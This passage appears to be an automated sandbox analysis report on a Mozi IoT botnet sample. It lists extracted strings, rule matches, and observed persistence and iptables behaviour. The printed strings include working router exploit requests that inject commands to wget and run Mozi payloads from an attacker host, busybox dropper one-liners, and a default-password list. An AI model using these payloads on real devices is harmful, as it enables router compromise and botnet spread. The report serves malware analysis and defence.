Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
              Source: mozi.a.zipString found in binary or memory: http://%s:%d/Mozi.a;chmod
              Source: mozi.a.zipString found in binary or memory: http://%s:%d/Mozi.a;sh$
              Source: mozi.a.zipString found in binary or memory: http://%s:%d/Mozi.m
              Source: mozi.a.zipString found in binary or memory: http://%s:%d/Mozi.m;
              Source: mozi.a.zipString found in binary or memory: http://%s:%d/Mozi.m;$
              Source: mozi.a.zipString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
              Source: mozi.a.zipString found in binary or memory: http://%s:%d/bin.sh
              Source: mozi.a.zipString found in binary or memory: http://%s:%d/bin.sh;chmod
              Source: mozi.a.zipString found in binary or memory: http://127.0.0.1
              Source: mozi.a.zipString found in binary or memory: http://127.0.0.1sendcmd
              Source: mozi.a.zipString found in binary or memory: http://HTTP/1.1
              Source: mozi.a.zipString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
              Source: .config.8.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
              Source: mozi.a.zipString found in binary or memory: http://ipinfo.io/ip
              Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca)
              Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
              Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
              Source: mozi.a.zipString found in binary or memory: http://purenetworks.com/HNAP1/
              Source: mozi.a.zipString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: mozi.a.zipString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: mozi.a.zipString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
              Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org
              Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org.
              Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
              Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
              Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca
              Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca.
              Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca/upload.php
              Source: /tmp/mozi.a.zip (PID: 4598)HTML file containing JavaScript created: /usr/networksJump to dropped file
              Source: Initial sampleString containing 'busybox' found: busybox
              Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
              Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
              Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
              Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
              Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
              Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
              Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
              Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
              Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
              Source: Initial sampleString containing potential weak password found: admin
              Source: Initial sampleString containing potential weak password found: default
              Source: Initial sampleString containing potential weak password found: support
              Source: Initial sampleString containing potential weak password found: service
              Source: Initial sampleString containing potential weak password found: supervisor
              Source: Initial sampleString containing potential weak password found: guest
              Source: Initial sampleString containing potential weak password found: administrator
              Source: Initial sampleString containing potential weak password found: 123456
              Source: Initial sampleString containing potential weak password found: 54321
              Source: Initial sampleString containing potential weak password found: password
              Source: Initial sampleString containing potential weak password found: 12345
              Source: Initial sampleString containing potential weak password found: admin1234
              Source: Initial samplePotential command found: POST /cdn-cgi/
              Source: Initial samplePotential command found: GET /c HTTP/1.0
              Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
              Source: Initial samplePotential command found: GET %s HTTP/1.1
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
              Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
              Source: Initial samplePotential command found: mount -o remount,rw /overlay /
              Source: Initial samplePotential command found: mv -f %s %s
              Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: GET /c
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: killall -9 %s
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
              Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
              Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
              Source: Initial samplePotential command found: GET /%s HTTP/1.1
              Source: Initial samplePotential command found: POST /%s HTTP/1.1
              Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
              Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
              Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
              Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
              Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
              Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
              Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
              Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
              Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: mozi.a.zip, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
              Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
              Source: classification engineClassification label: mal100.spre.troj.evad.linZIP@0/221@4/0

              Persistence and Installation Behavior:

              barindex
              Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
              Source: /bin/sh (PID: 4638)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
              Source: /tmp/mozi.a.zip (PID: 4598)File: /proc/4598/mountsJump to behavior
              Sample tries to persist itself using /etc/profileShow sources
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/profile.d/apps-bin-path.shJump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/profile.d/Z97-byobu.shJump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/profile.d/bash_completion.shJump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/profile.d/vte-2.91.shJump to behavior
              Sample tries to persist itself using System V runlevelsShow sources
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/rcS.d/S95baby.shJump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/rc.localJump to behavior
              Terminates several processes with shell command 'killall'Show sources
              Source: /bin/sh (PID: 4602)Killall command executed: killall -9 telnetd utelnetd scfgmgr
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/230/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/231/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/232/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/233/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/234/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3512/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/359/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/1452/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3632/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/4600/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3518/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/10/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/1339/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/11/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/12/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/13/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/14/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/15/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/16/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/17/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/18/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/19/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/483/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3527/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3527/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/1/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/2/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3525/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/1346/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3524/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3524/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/4/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3523/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/5/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/7/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/8/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/9/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/20/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/21/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/22/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/23/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/24/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/25/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/28/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/29/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/1363/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3541/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3541/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/1362/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/496/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/496/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/30/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/31/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/31/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/1119/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3790/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3791/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3310/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3431/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3431/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3550/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/260/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/263/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/264/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/385/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/144/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/386/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/145/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/146/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3546/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3546/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/147/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3303/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3545/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/148/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/149/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3543/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/822/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/822/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3308/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3308/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3429/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3429/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/47/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/48/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/48/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/49/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/150/stat
